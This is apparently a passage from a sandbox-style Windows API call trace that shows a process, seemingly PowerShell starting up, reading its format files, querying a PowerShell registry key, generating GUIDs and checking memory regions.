	[0300.268] ReadFile (in: hFile=0x32c, lpBuffer=0x3275420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3275420*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.268] ReadFile (in: hFile=0x32c, lpBuffer=0x3275420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3275420*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.268] ReadFile (in: hFile=0x32c, lpBuffer=0x3275420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3275420*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.268] ReadFile (in: hFile=0x32c, lpBuffer=0x3275420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3275420*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.268] ReadFile (in: hFile=0x32c, lpBuffer=0x3275420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3275420*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.269] ReadFile (in: hFile=0x32c, lpBuffer=0x3275420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3275420*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.269] ReadFile (in: hFile=0x32c, lpBuffer=0x3275420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3275420*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.269] ReadFile (in: hFile=0x32c, lpBuffer=0x3275420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3275420*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.269] ReadFile (in: hFile=0x32c, lpBuffer=0x3275420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3275420*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.269] ReadFile (in: hFile=0x32c, lpBuffer=0x3275420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3275420*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.270] ReadFile (in: hFile=0x32c, lpBuffer=0x3275420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3275420*, lpNumberOfBytesRead=0x28cdf8*=0xe67, lpOverlapped=0x0) returned 1
	[0300.270] ReadFile (in: hFile=0x32c, lpBuffer=0x32749ef, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x32749ef*, lpNumberOfBytesRead=0x28cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0300.270] ReadFile (in: hFile=0x32c, lpBuffer=0x3275420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x3275420*, lpNumberOfBytesRead=0x28cdf8*=0x0, lpOverlapped=0x0) returned 1
	[0300.270] CloseHandle (hObject=0x32c) returned 1
	[0300.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0300.270] SetErrorMode (uMode=0x1) returned 0x1
	[0300.270] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28cda0 | out: lpFileInformation=0x28cda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0300.270] SetErrorMode (uMode=0x1) returned 0x1
	[0300.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0300.271] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28ce88 | out: phkResult=0x28ce88*=0x32c) returned 0x0
	[0300.271] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28ce0c, lpData=0x0, lpcbData=0x28ce08*=0x0 | out: lpType=0x28ce0c*=0x1, lpData=0x0, lpcbData=0x28ce08*=0x56) returned 0x0
	[0300.271] CoTaskMemAlloc (cb=0x5a) returned 0x1b6ff740
	[0300.271] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28cddc, lpData=0x1b6ff740, lpcbData=0x28cdd8*=0x56 | out: lpType=0x28cddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28cdd8*=0x56) returned 0x0
	[0300.271] CoTaskMemFree (pv=0x1b6ff740) 
	[0300.271] RegCloseKey (hKey=0x32c) returned 0x0
	[0300.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28cad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0300.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x28c980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0300.280] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xd6a6ef49, Data2=0xb45f, Data3=0x4b41, Data4=([0]=0x88, [1]=0xfb, [2]=0x24, [3]=0x55, [4]=0x7d, [5]=0x22, [6]=0xf3, [7]=0x47))) returned 0x0
	[0300.281] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xb7b94c94, Data2=0x1c8, Data3=0x4747, Data4=([0]=0xbd, [1]=0xda, [2]=0xc3, [3]=0xef, [4]=0xf3, [5]=0xfb, [6]=0xb6, [7]=0xa4))) returned 0x0
	[0300.281] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x5b5ac9da, Data2=0xcf01, Data3=0x4994, Data4=([0]=0xa4, [1]=0x20, [2]=0x25, [3]=0x8c, [4]=0xd9, [5]=0x25, [6]=0x5, [7]=0xd5))) returned 0x0
	[0300.281] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xb43f6941, Data2=0x15f7, Data3=0x4722, Data4=([0]=0xae, [1]=0x67, [2]=0x14, [3]=0x45, [4]=0x4b, [5]=0x58, [6]=0xa1, [7]=0x38))) returned 0x0
	[0300.281] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xf4945e62, Data2=0xd427, Data3=0x44c1, Data4=([0]=0x84, [1]=0xbb, [2]=0xd6, [3]=0x64, [4]=0xe7, [5]=0x11, [6]=0x6f, [7]=0x4))) returned 0x0
	[0300.281] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x942ef31e, Data2=0x5652, Data3=0x48c5, Data4=([0]=0xb2, [1]=0x6a, [2]=0x56, [3]=0xc0, [4]=0x8b, [5]=0x8, [6]=0xd1, [7]=0x74))) returned 0x0
	[0300.281] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xc114a758, Data2=0xdb83, Data3=0x4e1f, Data4=([0]=0x9d, [1]=0x82, [2]=0xa2, [3]=0xcf, [4]=0xd0, [5]=0x21, [6]=0xf3, [7]=0xca))) returned 0x0
	[0300.281] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0300.281] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x205f0b42, Data2=0xf4cc, Data3=0x4c8a, Data4=([0]=0x8b, [1]=0x8c, [2]=0xb7, [3]=0xee, [4]=0x2b, [5]=0x6f, [6]=0x2c, [7]=0xdc))) returned 0x0
	[0300.282] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x6beb61c0, Data2=0x5ddf, Data3=0x4c4e, Data4=([0]=0x96, [1]=0x25, [2]=0xd9, [3]=0x68, [4]=0x1a, [5]=0xff, [6]=0xa4, [7]=0xf6))) returned 0x0
	[0300.282] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x1f5066de, Data2=0x8555, Data3=0x4fcc, Data4=([0]=0x93, [1]=0x61, [2]=0x40, [3]=0x72, [4]=0x57, [5]=0x51, [6]=0x30, [7]=0x19))) returned 0x0
	[0300.282] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xc0d76d9b, Data2=0x4b09, Data3=0x462f, Data4=([0]=0x8b, [1]=0x68, [2]=0x98, [3]=0x3d, [4]=0x46, [5]=0xc4, [6]=0xbc, [7]=0x50))) returned 0x0
	[0300.282] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x9a26a42f, Data2=0x7d0b, Data3=0x4b52, Data4=([0]=0x9d, [1]=0x84, [2]=0xb5, [3]=0x18, [4]=0xb2, [5]=0x1f, [6]=0x4d, [7]=0x43))) returned 0x0
	[0300.282] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xa752bbfa, Data2=0x8363, Data3=0x4bc7, Data4=([0]=0xbf, [1]=0x88, [2]=0x46, [3]=0xb7, [4]=0x86, [5]=0xe5, [6]=0x94, [7]=0x72))) returned 0x0
	[0300.282] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xf0bdc7c6, Data2=0xb6bf, Data3=0x4eb4, Data4=([0]=0x92, [1]=0x13, [2]=0x0, [3]=0x26, [4]=0x3a, [5]=0xa8, [6]=0x97, [7]=0x23))) returned 0x0
	[0300.282] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x668662b3, Data2=0xfe22, Data3=0x4bbb, Data4=([0]=0x91, [1]=0x17, [2]=0xf9, [3]=0xb9, [4]=0x8b, [5]=0xcd, [6]=0x84, [7]=0x19))) returned 0x0
	[0300.282] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x652bc8ba, Data2=0x59f3, Data3=0x4c07, Data4=([0]=0x82, [1]=0xe, [2]=0xfb, [3]=0x5a, [4]=0xc7, [5]=0xee, [6]=0x41, [7]=0x38))) returned 0x0
	[0300.282] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x63200997, Data2=0x2b17, Data3=0x4227, Data4=([0]=0xb6, [1]=0xcd, [2]=0xf2, [3]=0xde, [4]=0xc7, [5]=0x70, [6]=0x32, [7]=0x19))) returned 0x0
	[0300.282] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xb9cfaed2, Data2=0x12da, Data3=0x4dae, Data4=([0]=0x89, [1]=0x20, [2]=0xdb, [3]=0xb3, [4]=0x7f, [5]=0x81, [6]=0x30, [7]=0x2b))) returned 0x0
	[0300.283] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x6b27242a, Data2=0xf79e, Data3=0x4570, Data4=([0]=0x9e, [1]=0x55, [2]=0xd2, [3]=0x31, [4]=0x73, [5]=0x81, [6]=0x7d, [7]=0x71))) returned 0x0
	[0300.283] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0300.283] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0300.283] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0300.283] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x2325fe8d, Data2=0xa5e3, Data3=0x4964, Data4=([0]=0x95, [1]=0x1d, [2]=0xa0, [3]=0x60, [4]=0xa0, [5]=0x18, [6]=0x8b, [7]=0xb6))) returned 0x0
	[0300.283] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x9d2dc1ed, Data2=0xee6d, Data3=0x416f, Data4=([0]=0x99, [1]=0x38, [2]=0xd3, [3]=0xff, [4]=0x2f, [5]=0x6c, [6]=0xb5, [7]=0xc8))) returned 0x0
	[0300.283] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x3d64dc75, Data2=0xee08, Data3=0x4783, Data4=([0]=0x9f, [1]=0xe6, [2]=0xe1, [3]=0x38, [4]=0xec, [5]=0x81, [6]=0x4b, [7]=0x77))) returned 0x0
	[0300.283] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xc6c6fc19, Data2=0x3790, Data3=0x4755, Data4=([0]=0x8e, [1]=0xc3, [2]=0x5c, [3]=0xa7, [4]=0xf, [5]=0x9c, [6]=0xe1, [7]=0x3e))) returned 0x0
	[0300.284] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x8e8cc739, Data2=0x37e6, Data3=0x4fee, Data4=([0]=0x8e, [1]=0xa8, [2]=0x40, [3]=0x1d, [4]=0x52, [5]=0x2d, [6]=0x6e, [7]=0xc4))) returned 0x0
	[0300.284] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xaa7d935b, Data2=0x9f1c, Data3=0x4bd5, Data4=([0]=0x85, [1]=0xf3, [2]=0x9e, [3]=0x53, [4]=0xdf, [5]=0xf0, [6]=0xab, [7]=0x66))) returned 0x0
	[0300.284] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xfb145530, Data2=0x2981, Data3=0x45de, Data4=([0]=0xae, [1]=0x9e, [2]=0xba, [3]=0xcd, [4]=0x6, [5]=0xf1, [6]=0xaa, [7]=0xdd))) returned 0x0
	[0300.284] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x494ce197, Data2=0x66a, Data3=0x4a63, Data4=([0]=0xa8, [1]=0xa6, [2]=0x60, [3]=0x54, [4]=0x7b, [5]=0x90, [6]=0x24, [7]=0x3d))) returned 0x0
	[0300.284] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xbc9d893b, Data2=0x465b, Data3=0x44f6, Data4=([0]=0xb7, [1]=0x7d, [2]=0x8e, [3]=0x9a, [4]=0x7e, [5]=0xa7, [6]=0x8c, [7]=0xb8))) returned 0x0
	[0300.284] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x4bf02240, Data2=0x7484, Data3=0x44d1, Data4=([0]=0xaa, [1]=0xf0, [2]=0x92, [3]=0xfa, [4]=0x55, [5]=0xb9, [6]=0x31, [7]=0x2d))) returned 0x0
	[0300.284] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x816a2473, Data2=0xfc90, Data3=0x4c00, Data4=([0]=0xba, [1]=0x97, [2]=0xe7, [3]=0x15, [4]=0x78, [5]=0x65, [6]=0xf4, [7]=0x16))) returned 0x0
	[0300.284] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x81717b50, Data2=0x425f, Data3=0x47da, Data4=([0]=0x9f, [1]=0xce, [2]=0x98, [3]=0x43, [4]=0xb8, [5]=0xef, [6]=0x31, [7]=0x5a))) returned 0x0
	[0300.284] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x30bacbd3, Data2=0xa918, Data3=0x4dbd, Data4=([0]=0x80, [1]=0x1, [2]=0x67, [3]=0xe7, [4]=0x10, [5]=0x8f, [6]=0x89, [7]=0xab))) returned 0x0
	[0300.284] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0300.285] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x1c76434c, Data2=0xbd46, Data3=0x4fdc, Data4=([0]=0x9d, [1]=0xc2, [2]=0x9a, [3]=0x8, [4]=0xcd, [5]=0x20, [6]=0xda, [7]=0x13))) returned 0x0
	[0300.285] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0300.285] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0300.286] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xead96a2c, Data2=0x7e7c, Data3=0x4bf2, Data4=([0]=0xb4, [1]=0x5, [2]=0xc7, [3]=0xc1, [4]=0x87, [5]=0x75, [6]=0x92, [7]=0xd))) returned 0x0
	[0300.286] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0300.286] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x360587f6, Data2=0xd98d, Data3=0x497f, Data4=([0]=0xb4, [1]=0xe5, [2]=0x82, [3]=0x81, [4]=0xb7, [5]=0x66, [6]=0x3f, [7]=0xd4))) returned 0x0
	[0300.286] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xf89cbbf6, Data2=0x4f57, Data3=0x437c, Data4=([0]=0xba, [1]=0x91, [2]=0x30, [3]=0x3b, [4]=0xb0, [5]=0x86, [6]=0x2, [7]=0x4e))) returned 0x0
	[0300.286] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xca2f4f1c, Data2=0xf818, Data3=0x465d, Data4=([0]=0x93, [1]=0xda, [2]=0x71, [3]=0xb4, [4]=0xbb, [5]=0xe0, [6]=0xbb, [7]=0x6b))) returned 0x0
	[0300.287] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x9fe4eab5, Data2=0x8ec7, Data3=0x43ec, Data4=([0]=0xa1, [1]=0x20, [2]=0x80, [3]=0x22, [4]=0x53, [5]=0x5e, [6]=0x4b, [7]=0x3f))) returned 0x0
	[0300.287] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xe5e2f786, Data2=0xaacc, Data3=0x4670, Data4=([0]=0x87, [1]=0x94, [2]=0x2e, [3]=0xc1, [4]=0xeb, [5]=0xb9, [6]=0xf1, [7]=0xf))) returned 0x0
	[0300.287] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xe21a3f54, Data2=0xddfb, Data3=0x4d21, Data4=([0]=0xaa, [1]=0x18, [2]=0xcc, [3]=0x57, [4]=0xec, [5]=0xe4, [6]=0x43, [7]=0xae))) returned 0x0
	[0300.287] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xebd3d17b, Data2=0xf396, Data3=0x4b13, Data4=([0]=0xa4, [1]=0xc4, [2]=0x1b, [3]=0xa3, [4]=0x33, [5]=0x46, [6]=0xe5, [7]=0x84))) returned 0x0
	[0300.287] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0300.287] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0xed4f4865, Data2=0x4f47, Data3=0x4ade, Data4=([0]=0x94, [1]=0x77, [2]=0x52, [3]=0xd6, [4]=0xcc, [5]=0x41, [6]=0x25, [7]=0x58))) returned 0x0
	[0300.287] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x7c44f867, Data2=0xec00, Data3=0x4b3f, Data4=([0]=0xbd, [1]=0xc, [2]=0x1d, [3]=0xf2, [4]=0xc9, [5]=0x40, [6]=0x58, [7]=0xe7))) returned 0x0
	[0300.287] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x3b2b0e9f, Data2=0x7cb7, Data3=0x44c8, Data4=([0]=0x98, [1]=0x23, [2]=0x2b, [3]=0xcc, [4]=0xae, [5]=0x95, [6]=0x4b, [7]=0x1))) returned 0x0
	[0300.288] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x67ad1ea5, Data2=0x7cf7, Data3=0x442c, Data4=([0]=0x9f, [1]=0x6, [2]=0x2, [3]=0xea, [4]=0x23, [5]=0x51, [6]=0x9b, [7]=0xcd))) returned 0x0
	[0300.288] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x5cfa8e8f, Data2=0x441c, Data3=0x46a3, Data4=([0]=0x8a, [1]=0xef, [2]=0x2f, [3]=0x70, [4]=0x43, [5]=0x71, [6]=0x43, [7]=0xe3))) returned 0x0
	[0300.288] VirtualQuery (in: lpAddress=0x28ba60, lpBuffer=0x28c920, dwLength=0x30 | out: lpBuffer=0x28c920*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.288] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x1b4dfc0d, Data2=0x5bef, Data3=0x487f, Data4=([0]=0x9a, [1]=0x78, [2]=0x64, [3]=0x57, [4]=0xfd, [5]=0xef, [6]=0x3c, [7]=0x87))) returned 0x0
	[0300.288] CoCreateGuid (in: pguid=0x28d0b0 | out: pguid=0x28d0b0*(Data1=0x6f6a30da, Data2=0x2906, Data3=0x48b3, Data4=([0]=0xb3, [1]=0xc7, [2]=0x77, [3]=0x9b, [4]=0xe1, [5]=0x51, [6]=0x4a, [7]=0x4c))) returned 0x0
	[0300.288] VirtualQuery (in: lpAddress=0x28bad0, lpBuffer=0x28c990, dwLength=0x30 | out: lpBuffer=0x28c990*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.288] VirtualQuery (in: lpAddress=0x28bad0, lpBuffer=0x28c990, dwLength=0x30 | out: lpBuffer=0x28c990*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.288] VirtualQuery (in: lpAddress=0x28bad0, lpBuffer=0x28c990, dwLength=0x30 | out: lpBuffer=0x28c990*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.288] VirtualQuery (in: lpAddress=0x28bad0, lpBuffer=0x28c990, dwLength=0x30 | out: lpBuffer=0x28c990*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.289] SetErrorMode (uMode=0x1) returned 0x1
	[0300.289] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0300.289] GetFileType (hFile=0x32c) returned 0x1
	[0300.289] SetErrorMode (uMode=0x1) returned 0x1
	[0300.289] GetFileType (hFile=0x32c) returned 0x1
	[0300.289] ReadFile (in: hFile=0x32c, lpBuffer=0x2ebe260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ebe260*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.290] ReadFile (in: hFile=0x32c, lpBuffer=0x2ebe260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ebe260*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.290] ReadFile (in: hFile=0x32c, lpBuffer=0x2ebe260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ebe260*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.290] ReadFile (in: hFile=0x32c, lpBuffer=0x2ebe260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ebe260*, lpNumberOfBytesRead=0x28cdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.290] ReadFile (in: hFile=0x32c, lpBuffer=0x2ebe260, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ebe260*, lpNumberOfBytesRead=0x28cdf8*=0x8b4, lpOverlapped=0x0) returned 1
	[0300.290] ReadFile (in: hFile=0x32c, lpBuffer=0x2ebd67c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x28cdf8, lpOverlapped=0x0 | out: lpBuffer=0x2ebd67c*, lpNumberOfBytesRead=0x28cdf8*=0x0, lpOverlapped=0x0) returned 1
